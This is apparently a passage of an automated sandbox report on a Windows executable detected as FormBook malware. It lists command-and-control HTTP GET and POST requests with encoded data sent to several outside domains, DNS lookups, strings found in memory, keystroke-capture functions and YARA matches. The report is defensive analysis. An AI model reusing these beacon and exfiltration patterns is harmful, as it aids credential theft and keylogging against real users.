47 4e 6c 4b 38 75 5a 7e 45 72 4b 4d 7a 4d 57 67 35 4e 50 42 50 4b 53 78 52 6c 35 6e 4f 79 6e 45 76 50 58 64 58 42 47 43 6d 41 4d 53 55 7e 45 6c 69 75 51 4a 4a 64 53 7a 6c 68 4a 79 54 67 58 4e 4b 50 62 7e 51 75 4a 4a 58 62 5f 62 39 6f 66 75 46 6f 64 7a 54 76 41 46 74 44 44 79 42 34 41 64 4e 28 6e 54 46 33 55 4f 64 46 30 52 5a 34 75 74 47 5a 61 67 63 4c 61 44 4d 32 6e 58 75 6c 56 7e 70 62 49 48 45 54 4a 69 6b 50 37 53 78 67 71 6a 32 63 73 28 49 58 6c 49 37 46 79 4c 6a 4a 30 61 2d 35 45 45 79 33 75 76 63 6f 77 6a 30 7a 31 4d 59 6b 4f 69 39 76 74 46 54 58 33 46 48 30 78 4c 4b 79 75 76 53 4a 72 54 4b 6e 4a 69 38 61 4a 4e 4e 49 4e 72 36 53 56 64 72 4c 37 48 39 53 37 37 4d 61 6b 39 7a 58 63 6c 64 42 59 71 59 43 4b 33 61 45 77 49 59 5a 31 57 31 62 71 34 6b 57 64 57 72 30 64 78 39 39 45 66 48 55 6f 6a 63 71 5f 46 48 69 6e 5a 6d 7e 51 35 70 77 33 36 5f 78 74 43 4e 4d 59 63 64 42 44 49 4d 4a 34 53 38 4d 34 4c 36 46 39 38 6c 4c 78 6b 41 48 69 28 6c 6a 31 37 65 33 6a 48 65 31 39 7e 51 6b 54 4d 74 4e 34 4d 5a 70 53 65 73 68 73 64 4a 39 68 33 6d 6c 67 37 49 7a 68 43 49 58 71 4f 46 66 4c 64 6c 79 69 6f 68 47 78 77 78 75 54 5a 65 7e 6a 34 76 6d 2d 72 7a 6a 5f 65 36 70 62 54 6c 67 79 67 4a 30 59 43 43 31 30 36 56 4d 79 6b 62 64 51 6b 34 78 38 55 34 78 5f 42 6f 30 53 67 43 54 79 4e 6a 6e 33 39 54 4e 31 73 67 31 4d 71 74 36 4e 57 4a 67 4a 65 46 45 37 73 66 75 6f 58 2d 39 58 43 4f 31 59 68 33 46 78 41 30 66 47 51 39 67 32 6c 44 62 31 33 7a 6a 38 7e 63 42 74 74 68 69 47 37 58 33 55 52 58 44 37 44 6a 6f 4d 4b 77 78 65 6c 69 61 34 74 58 59 47 31 54 58 32 38 38 58 33 45 47 50 73 49 72 61 50 52 69 37 39 53 53 71 6d 74 78 4a 56 76 69 53 75 6d 79 6f 63 49 65 63 2d 6c 6b 31 35 54 6a 41 4c 32 75 75 36 6b 6c 52 45 4b 78 49 51 4b 77 56 70 35 41 6f 30 62 33 51 43 59 31 78 4d 6b 76 68 71 6e 5
 Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1Host: www.tylermercer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.oraning.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 19 May 2020 08:38:38 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmp String found in binary or memory: http://www.allixanes.com/ez3/ Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000004.00000000.889874232.0000000007B92000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC: Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

 Contains functionality to retrieve information about pressed keystrokes Show sources
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_00449F24 GetKeyboardState, 0_2_00449F24
 Creates a DirectInput object (often for capturing keystrokes) Show sources
 Source: sdv88p2lg.exe, 0000000E.00000002.1485735250.0000000000790000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources